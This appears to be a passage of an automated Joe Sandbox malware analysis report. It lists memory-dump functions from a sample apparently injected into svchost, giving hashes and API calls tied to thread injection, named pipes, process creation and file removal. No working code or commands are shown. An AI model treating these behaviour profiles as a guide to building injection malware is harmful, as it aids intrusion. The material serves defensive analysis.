                                                                                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.2248816888.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_5370000_medicallanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                              • Opcode ID: eaeb2f9a6acfff420061237a00082eaadf805791ca87dca6ec0b0d55e0b321d1
                                                                                                                                                                                                                                                                                                              • Instruction ID: a46e263324012b9d30a3bb9b22efd004526510566df870f12c42d19649e6bcd5
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: eaeb2f9a6acfff420061237a00082eaadf805791ca87dca6ec0b0d55e0b321d1
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 462102B1D01248DFDB24CFA9C894BDEBBB9BF48310F208429E405B7240CB789945CB94
                                                                                                                                                                                                                                                                                                              Function 053733B6 Relevance: .1, Instructions: 59COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.2248816888.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_5370000_medicallanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                              • Opcode ID: fd42eac8b5a7b365312cdb72e892dfb0e1f54e1650203dac79ffd5f1b857f567
                                                                                                                                                                                                                                                                                                              • Instruction ID: 5a59ac7651cace886144c1ce5b89183b6353e6b586b627b24a61ca4ef3ba0c20
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fd42eac8b5a7b365312cdb72e892dfb0e1f54e1650203dac79ffd5f1b857f567
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3C211831E0460ECBDB24CFD5C5546AEBBB2FF84304F20891AD816BB644DBB4A9459B41
                                                                                                                                                                                                                                                                                                              Function 05374BC8 Relevance: .0, Instructions: 38COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.2248816888.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_5370000_medicallanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                              • Opcode ID: ce254262218060314f282fb57ba0337094f585885eb48b8c385151ebe70aecc3
                                                                                                                                                                                                                                                                                                              • Instruction ID: 15afc071aaf2308eb25468d0120a3663d1a0d63380887513d3ab97be7085f55c
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ce254262218060314f282fb57ba0337094f585885eb48b8c385151ebe70aecc3
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 88F0DC313087508FC726F338D40839E7AE69B82314F10087DD0468B7A5DFBAA985C3A1
                                                                                                                                                                                                                                                                                                              Function 05371AB8 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.2248816888.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_5370000_medicallanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                              • Opcode ID: e2baa9ac07851ef52701ebf45ffc64286e05f36971977261fcc41d48f6e774f9
                                                                                                                                                                                                                                                                                                              • Instruction ID: 89f350d45a6019fbf61ef913ce9af2b58de7728af7fc0510f87a64dfeb6410c3
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e2baa9ac07851ef52701ebf45ffc64286e05f36971977261fcc41d48f6e774f9
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B7F09E73F087084FD322A7784856669BB26E9C1290384827AD04BCFB14EA79C806C780
                                                                                                                                                                                                                                                                                                              Function 05372F96 Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.2248816888.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_5370000_medicallanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                              • Opcode ID: 4bd761d22306169eebf6c4a31120532e9f668b3d7a4d4d506a9d79c18082c10c
                                                                                                                                                                                                                                                                                                              • Instruction ID: 251021ae330ccc3cce556e1e30ce71c92d5bf12a299d948a5a6998493dd5d7df
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4bd761d22306169eebf6c4a31120532e9f668b3d7a4d4d506a9d79c18082c10c
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 07F0E535F4020CDBEF10AF70ED44A6E3BAAEB80711F144050E9489F2A4D775DC11CB81
                                                                                                                                                                                                                                                                                                              Function 05371990 Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.2248816888.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_5370000_medicallanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                              • Opcode ID: ce50bac969270d2faf7788a896db57cf556e7babffaba7821324b74fa8f281ee
                                                                                                                                                                                                                                                                                                              • Instruction ID: c67496da105f493ea8d9b0c394b09783b194c3421317c8805739bce6095a09eb
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ce50bac969270d2faf7788a896db57cf556e7babffaba7821324b74fa8f281ee
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AEE09272E1024DAFC701DAA4D942B5CBBF9EB06314F101564D44DD3201EA345E04C790
                                                                                                                                                                                                                                                                                                              Function 05372F67 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.2248816888.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_5370000_medicallanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                              • Opcode ID: 7f35338f0d5583b3267970eadab2cea8f91ac5f185cac2d3911b2990b420754f
                                                                                                                                                                                                                                                                                                              • Instruction ID: 37bf6f0cbf4d09f8df9f3e061ca3eacd16c3c8881d2a27ca10f07ac92309d69d
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7f35338f0d5583b3267970eadab2cea8f91ac5f185cac2d3911b2990b420754f
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 25E0E575D04219DF8B44EFA9EC056EEBBB4EE08210B5044AAE928E3241E7346B108BD4
                                                                                                                                                                                                                                                                                                              Function 05371950 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.2248816888.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_5370000_medicallanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                              • Opcode ID: d9b72ae0936205334957200da3ba40fbe78e90c019d829b2faca689e14d391cd
                                                                                                                                                                                                                                                                                                              • Instruction ID: 666b21f029db3f41b2877ff81ba5db830310738e3364fe92410390ae60b9f0fc
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d9b72ae0936205334957200da3ba40fbe78e90c019d829b2faca689e14d391cd
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8CE08C314097C54FCB03A738ED982043F69EB03305F0A5496D0848E2BBD728D84CCB04
                                                                                                                                                                                                                                                                                                              Function 053719A0 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.2248816888.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_5370000_medicallanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                              • Opcode ID: b494ac512791509872bb9547955a82f4a28e0f080aa98c5a36e4469c3cae1911
                                                                                                                                                                                                                                                                                                              • Instruction ID: 7ab1b6745151f0deb5a2038250d37119bda9a0723f3a0a2e964a8e64c5e60e6a
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b494ac512791509872bb9547955a82f4a28e0f080aa98c5a36e4469c3cae1911
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A6D01230910208EF8B41DFA8DA4555DBBF9EB44310B1055A8D40DD7205EA315F049740
                                                                                                                                                                                                                                                                                                              Function 053717E8 Relevance: .0, Instructions: 14COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.2248816888.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_5370000_medicallanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                              • Opcode ID: 9eb9d46aa597788f1ae9337034fde08797798191c6c1347feb9b2930c4823215
                                                                                                                                                                                                                                                                                                              • Instruction ID: c77e39bd667f515858ff635f7c968e9948f39d1a72586689edb67b19d7404b0b
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9eb9d46aa597788f1ae9337034fde08797798191c6c1347feb9b2930c4823215
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A5C0123170462457C30957659801966B7999B8A616B108079D50D8B760DE739C028BD0
                                                                                                                                                                                                                                                                                                              Function 05371960 Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.2248816888.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_5370000_medicallanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                              • Opcode ID: 223a5a670767c42db7aa9142f2567de62f057a2dfa15e8d2b46eeffb30e8403d
                                                                                                                                                                                                                                                                                                              • Instruction ID: b2e30c5b0911b3e47a0352caa590ccdd951cf8fd70cdb53e69ac01cbae733ae9
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 223a5a670767c42db7aa9142f2567de62f057a2dfa15e8d2b46eeffb30e8403d
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F7C01230140A0A8FC701F77CF980605775DEB41315F008524A1184F26D9A74AD498B84
                                                                                                                                                                                                                                                                                                              Function 05372EA3 Relevance: .0, Instructions: 10COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.2248816888.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_5370000_medicallanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                              • Opcode ID: c50c1aeed563611b63e673d4a35c5d913a3c4e165b011e7930debd0ec5e2cbd9
                                                                                                                                                                                                                                                                                                              • Instruction ID: 58ae1703eb9572bc352d0fc36174be1e2d85022e14ebc7a7c29aa8cfc266067e
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c50c1aeed563611b63e673d4a35c5d913a3c4e165b011e7930debd0ec5e2cbd9
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 83C08C36B08A585BEF14DB36D3C4F1A3BD9F701B4AF280850F486CBA00D764A040CB11

                                                                                                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                                                                                                              Execution Coverage:23.7%
                                                                                                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                                              Signature Coverage:0%
                                                                                                                                                                                                                                                                                                              Total number of Nodes:20
                                                                                                                                                                                                                                                                                                              Total number of Limit Nodes:0
                                                                                                                                                                                                                                                                                                              execution_graph 418 18b292a1cf4 420 18b292a1d19 418->420 419 18b292a1fa1 420->419 427 18b292a15c0 420->427 422 18b292a1f98 CloseHandle 422->419 423 18b292a1f88 NtAcceptConnectPort 423->422 424 18b292a1e3a 424->422 424->423 430 18b292a1aa4 424->430 426 18b292a1f76 426->423 428 18b292a15f4 NtAcceptConnectPort 427->428 428->424 431 18b292a1aef 430->431 433 18b292a1b10 431->433 434 18b292a1870 431->434 433->426 436 18b292a1889 434->436 435 18b292a1949 435->433 436->435 437 18b292a1930 GetProcessMitigationPolicy 436->437 437->435 438 18b292a19b4 439 18b292a19c7 438->439 440 18b292a19e6 VirtualFree 439->440 441 18b292a19fb 439->441 440->441

                                                                                                                                                                                                                                                                                                              Callgraph

                                                                                                                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                                                                                                                              Function 00007DF4AE60E910 Relevance: 18.1, APIs: 6, Strings: 4, Instructions: 563nativeCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000010.00000003.2736860852.00007DF4AE5E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4AE5E1000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_3_7df4ae5e1000_svchost.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: AcceptConnectPort$DuplicateHandlecallocfree
                                                                                                                                                                                                                                                                                                              • String ID: ,$,$H$H
                                                                                                                                                                                                                                                                                                              • API String ID: 2459737528-3578512806
                                                                                                                                                                                                                                                                                                              • Opcode ID: a9947afaaa98f1177199e84ab3dbda009d5fccaad9051c9b13383d687201c208
                                                                                                                                                                                                                                                                                                              • Instruction ID: af2752849914565923025bae9631f55e190ba42ebf3517b54df53a5d641f2ead
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a9947afaaa98f1177199e84ab3dbda009d5fccaad9051c9b13383d687201c208
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CB02953061DB988BEB64DF18D88466BB7E1FBD8304F50493ED59FC3291DA74A9418B82
                                                                                                                                                                                                                                                                                                              Function 00007DF4AE60F180 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 156nativeCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000010.00000003.2736860852.00007DF4AE5E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4AE5E1000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_3_7df4ae5e1000_svchost.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: AcceptConnectPathPort$NameName_freemalloc
                                                                                                                                                                                                                                                                                                              • String ID: $0$@
                                                                                                                                                                                                                                                                                                              • API String ID: 3298263305-2347541974
                                                                                                                                                                                                                                                                                                              • Opcode ID: 41dfd5aa33c42447b157757b265737d871a333bd75be70a4a10737d4b23bee9e
                                                                                                                                                                                                                                                                                                              • Instruction ID: 6f905e23df861d4291dd9f6445a2b4b7cdd9e5b7141ef795a17a8cbf98b7e39b
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 41dfd5aa33c42447b157757b265737d871a333bd75be70a4a10737d4b23bee9e
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7051C23452D7888FE764DF58D4867AB77E0FB89304F50592EE4AEC2241EB74E4858B83
                                                                                                                                                                                                                                                                                                              Function 00007DF4AE60F32C Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 158nativeCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000010.00000003.2736860852.00007DF4AE5E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4AE5E1000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_3_7df4ae5e1000_svchost.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: AcceptConnectPortfree
                                                                                                                                                                                                                                                                                                              • String ID: $0$@
                                                                                                                                                                                                                                                                                                              • API String ID: 2184535508-2347541974
                                                                                                                                                                                                                                                                                                              • Opcode ID: 3f154c0dcd698207b74ecbf3349ee8280ba9b90b83e006a876e2d17fed3398f1
                                                                                                                                                                                                                                                                                                              • Instruction ID: b1c65fafdbe4fd44e677ce80261bd98767c5eea32fe5b715e7e0d2e38aea42d1
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3f154c0dcd698207b74ecbf3349ee8280ba9b90b83e006a876e2d17fed3398f1
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DB51AF3060DB898FE7A4DF69C4847ABB7E5FB98314F50592EE88EC3251DB74D4448B42
                                                                                                                                                                                                                                                                                                              Function 00007DF4AE600B80 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120fileCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000010.00000003.2736860852.00007DF4AE5E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4AE5E1000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_3_7df4ae5e1000_svchost.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: FileFind$DirectoryFirstNextRemove
                                                                                                                                                                                                                                                                                                              • String ID: \
                                                                                                                                                                                                                                                                                                              • API String ID: 2722548352-2967466578
                                                                                                                                                                                                                                                                                                              • Opcode ID: aa0ec3aa504d6ef0e5320522a7ffa5ee1f0828fe674872a74d1c1d53faa5203f
                                                                                                                                                                                                                                                                                                              • Instruction ID: c3458a2960507b587e92ca532fe199c6e5b5da9475833c28d5f1d7ceec9fafab
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: aa0ec3aa504d6ef0e5320522a7ffa5ee1f0828fe674872a74d1c1d53faa5203f
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6E41B23110C9888FEB85EF28DCD8ADA77B5FB94705F544A66D40BDB165DF38A844CB80
                                                                                                                                                                                                                                                                                                              Function 00007DF4AE6008CC Relevance: 6.2, APIs: 4, Instructions: 232processCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000010.00000003.2736860852.00007DF4AE5E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4AE5E1000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_3_7df4ae5e1000_svchost.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: Process$Create$CodeDesktopExitTerminate
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 3114477661-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: d9c65f78b88761f55749ee4c73d5915ec55cc6603792b3611b226317cd9e6f4d
                                                                                                                                                                                                                                                                                                              • Instruction ID: 85091e188d6c813fc0495daa366d80ff8f4758a7a9ebe9b818bf1f2473a4b8e0
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d9c65f78b88761f55749ee4c73d5915ec55cc6603792b3611b226317cd9e6f4d
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E071603051CB888FE7A4DF29D8587ABB7E5FB94315F405A2EE49BC3290DF7894418B42
                                                                                                                                                                                                                                                                                                              Function 00007DF4AE6059B0 Relevance: 4.6, APIs: 3, Instructions: 110pipeCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000010.00000003.2736860852.00007DF4AE5E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4AE5E1000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_3_7df4ae5e1000_svchost.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: NamedPipe$BindCallbackCompletionConnectCreate
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 2502124517-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: 64bc60262aa007af45c0078f76809d5417a24a6d2b7390d918a99979fd05e311
                                                                                                                                                                                                                                                                                                              • Instruction ID: 2833ecc625f370e1810fce142e9062dc1043bed54596338233b00ac7b9005fb6
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 64bc60262aa007af45c0078f76809d5417a24a6d2b7390d918a99979fd05e311
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 19315F30609A488FE7A4EF28D8D879B77F5FB94314F505A2BD45BC22D0DB38D8458B81
                                                                                                                                                                                                                                                                                                              Function 00007DF4AE5E286C Relevance: 3.3, APIs: 2, Instructions: 293threadinjectionCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000010.00000003.2736860852.00007DF4AE5E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4AE5E1000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_3_7df4ae5e1000_svchost.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: CloseHandleSuspendThread
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 1038686644-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: 1f8ece1503dc4297b761fc8aeeb38f081f212776847475056979e89073c5c51b
                                                                                                                                                                                                                                                                                                              • Instruction ID: a5176140cba3cd092d632ff1786751e321639b5b8c311ce5ca662f1c6f96fdcc
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1f8ece1503dc4297b761fc8aeeb38f081f212776847475056979e89073c5c51b
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 03913A34A0DA544BEB689B5DE9A127B73F1FF58314F14416ED09FC7189CA78E882CB81
                                                                                                                                                                                                                                                                                                              Function 0000018B292A1CF4 Relevance: 3.3, APIs: 2, Instructions: 278nativeCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000010.00000002.2739348169.0000018B292A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000018B292A0000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_2_18b292a0000_svchost.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: AcceptCloseConnectHandlePort
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 3811980168-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: c28fd07678fc221e1754ee083f118103e9e8097afeb12f13d48dc470bfa4e84b
                                                                                                                                                                                                                                                                                                              • Instruction ID: 4c34393d2985ede623176189719424042bcb2b5132ab25b7ba101cafb493e188
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c28fd07678fc221e1754ee083f118103e9e8097afeb12f13d48dc470bfa4e84b
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 47918531508E188FD769EF18C481BE9B3E2FB98360F14865ED48FC7196DB74B9428781
                                                                                                                                                                                                                                                                                                              Function 00007DF4AE61D42C Relevance: 1.8, APIs: 1, Instructions: 552COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000010.00000003.2736860852.00007DF4AE5E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4AE5E1000, based on PE: false
